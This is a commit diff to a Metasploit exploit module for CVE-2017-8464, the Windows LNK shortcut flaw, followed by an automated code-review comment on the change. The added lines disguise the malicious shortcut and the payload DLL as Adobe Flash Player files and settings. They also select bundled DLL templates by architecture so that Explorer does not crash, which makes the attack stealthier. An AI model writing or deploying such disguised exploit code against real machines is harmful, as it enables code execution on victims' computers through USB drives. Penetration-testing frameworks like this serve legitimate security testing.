Added new DLL templates to prevent crashing of Explorer
parent
67dddd2402
commit
e51e1d9638
Binary file not shown.
Binary file not shown.
|
@ -59,8 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('FILENAME', [false, 'The LNK file']),
|
OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']),
|
||||||
OptString.new('DLLNAME', [false, 'The DLL file containing the payload']),
|
OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']),
|
||||||
OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine'])
|
OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine'])
|
||||||
])
|
])
|
||||||
|
|
||||||
|
@ -71,6 +71,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
opts = {}
|
||||||
|
if target['Arch'] == ARCH_X64
|
||||||
|
datastore['EXE::Path'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
|
||||||
|
datastore['EXE::Template'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464', 'template_x64_windows.dll')
|
||||||
|
else
|
||||||
|
datastore['EXE::Path'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
|
||||||
|
datastore['EXE::Template'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464', 'template_x86_windows.dll')
|
||||||
|
end
|
||||||
dll = generate_payload_dll
|
dll = generate_payload_dll
|
||||||
dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll"
|
dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll"
|
||||||
dll_path = store_file(dll, dll_name)
|
dll_path = store_file(dll, dll_name)
|
||||||
|
@ -102,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
def generate_link(path)
|
def generate_link(path)
|
||||||
path << "\x00"
|
path << "\x00"
|
||||||
display_name = "Flash Player\x00" # LNK Display Name
|
display_name = "Flash Player\x00" # LNK Display Name
|
||||||
comment = "\x00"
|
comment = "Manage Flash Player Settings\x00"
|
||||||
|
|
||||||
# Control Panel Applet ItemID with our DLL
|
# Control Panel Applet ItemID with our DLL
|
||||||
cpl_applet = [
|
cpl_applet = [
|
||||||
|
|
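Review bot: In the lines added to `exploit` (second hunk), `opts = {}` is assigned but never used in the visible lines, and both branches of `if target['Arch'] == ARCH_X64` write the same `datastore['EXE::Path']` value, so only the template file name depends on the architecture. The assignments are unconditional, so any `EXE::Path` or `EXE::Template` the operator set beforehand appears to be silently overwritten; if that is intended, say so in a comment such as `# CVE-2017-8464 requires the bundled DLL templates; an operator-supplied EXE::Template is ignored`. I would drop `opts` unless later code uses it, set `EXE::Path` once before the branch, and select only the file name inside it, e.g. `template = target['Arch'] == ARCH_X64 ? 'template_x64_windows.dll' : 'template_x86_windows.dll'`. The body of `exploit` continues past the end of the hunk, so the `opts` remark should be checked against the full method.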